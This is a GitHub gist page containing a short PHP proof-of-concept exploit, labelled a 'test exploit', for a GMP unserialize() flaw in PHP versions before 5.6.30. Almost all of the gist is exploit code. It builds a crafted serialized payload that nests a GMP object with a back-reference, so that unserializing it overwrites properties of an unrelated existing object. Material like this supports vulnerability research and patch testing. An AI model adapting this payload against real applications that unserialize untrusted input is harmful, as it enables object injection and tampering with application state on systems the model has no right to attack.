Skip to content

Instantly share code, notes, and snippets.

@allyshka allyshka/test.php
Created Feb 10, 2017

Embed
What would you like to do?
PHP < 5.6.30 GMP unserialize() test exploit.
<?php
class obj
{
var $test;
function __wakeup()
{
$this->test = 1;
}
}
$obj = new stdClass;
$obj->var1 = 1;
$obj->var2 = 2;
$inner = 's:4:"1337";a:3:{s:4:"var1";s:6:"change";s:4:"var2";s:4:"this";i:0;O:3:"obj":1:{s:4:"test";R:2;}}';
$exploit = 'a:1:{i:0;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}';
$x = unserialize($exploit);
var_dump($obj);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.